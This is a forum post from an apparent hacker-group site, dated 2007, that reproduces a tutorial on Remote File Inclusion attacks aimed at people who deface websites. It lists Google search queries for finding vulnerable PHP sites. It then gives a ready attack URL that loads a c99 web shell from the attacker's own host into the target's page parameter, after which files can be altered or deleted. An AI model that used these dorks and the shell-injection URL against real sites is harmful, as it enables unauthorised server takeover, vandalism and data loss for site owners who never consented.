I.G
Would you like to react to this message? Create an account in a few clicks or log in to continue.
I.G

Hackers Team
 
HomeSearchLatest imagesRegisterLog in

I.G :: Downloads :: Files
 

 Remote File Inclusion

Go down 
AuthorMessage
rebel
iG Founder
iG Founder
rebel


Number of posts : 130
Age : 36
Localisation : Your Computer!
Registration date : 2007-01-20

Remote File Inclusion Empty
PostSubject: Remote File Inclusion   Remote File Inclusion Icon_minitimeSun Jan 28, 2007 4:26 am
Remote File Inclusion Vulnerabilities Explained
Written by entr0py


Introduction
----------------
Remote File Inclusion alias RFI vulnerabilities subsists in most
of the websites that deploy dynamic web programming languages like
PHP, etc. It mainly occurs due to obtuse coding. In this tutorial,
I am going to explain how one can take benefit of such errors. Well,
again I must tell you that this tutorial is only for script kiddies,
who love to exploit vulnerabilities in order to deface (h4x0r) websites.
This is the sequel of ‘Hacking with Shells’ tutorial written by myself.
Anyways, let’s get on with the tutorial...


RFI’s
----------------
Remote File Inclusion vulnerabilities can be defined as injection of
malicious scripts (c99, r57 etc) by obfuscated URL strings. These
vulnerabilities exists in many web applications softwares like Bulletin
Board Systems, Content Management Systems etc. Actually, when we inject
the malicious script through well-molded URL string, our script replaces
the given page. After replacement of page, our script is executed and then
produced in the website.


Skiddie Zone
-----------------
Well, let me give you an example that shows the accurate way to hack a
Website using RFI vulnerabilities. Okay, so, first of all you need to
have a website that’s actually vulnerable to RFI exploits.

Where would I get a vulnerable website?
Just one place – Google. Just Google inurl:index.php?page= or inurl:index.php?pagedb=,
just try your imagination. Basically, these search syntaxes, exhibits sites that are
enforcing other pages to execute from a standard string.

Okay, I got www.anysite.com, what should I next?
Now, you must inject a malicious (*evil script*) script that would give you full access
to the web server. Say, after Googling the above search syntax you got the following
URL: www.anysite.com/index.php?page=somelink.php. To inject the web shell, you must
Replace somelink.php, with the website that contains the web shell. Say, you have
the web shell in www.mysite.com/c99.txt, so to inject this web shell into a vulnerable
site, just execute the following URL: www.anysite.com/index.php?page= www.mysite.com/c99.txt
After injecting this URL, you would see that the C99 shell interface has popped in front
Of you. Just go alter the settings, delete file or do whatever you feel.
Back to top Go down
http://insanegamers.net.tc
 
Remote File Inclusion
Back to top 
Page 1 of 1
 Similar topics
-
» Desktop remote connection for MAC
» Windows XP Remote Desktop Connection software [XPSP2 5.1.260

Permissions in this forum:You cannot reply to topics in this forum
I.G :: Downloads :: Files-
Jump to: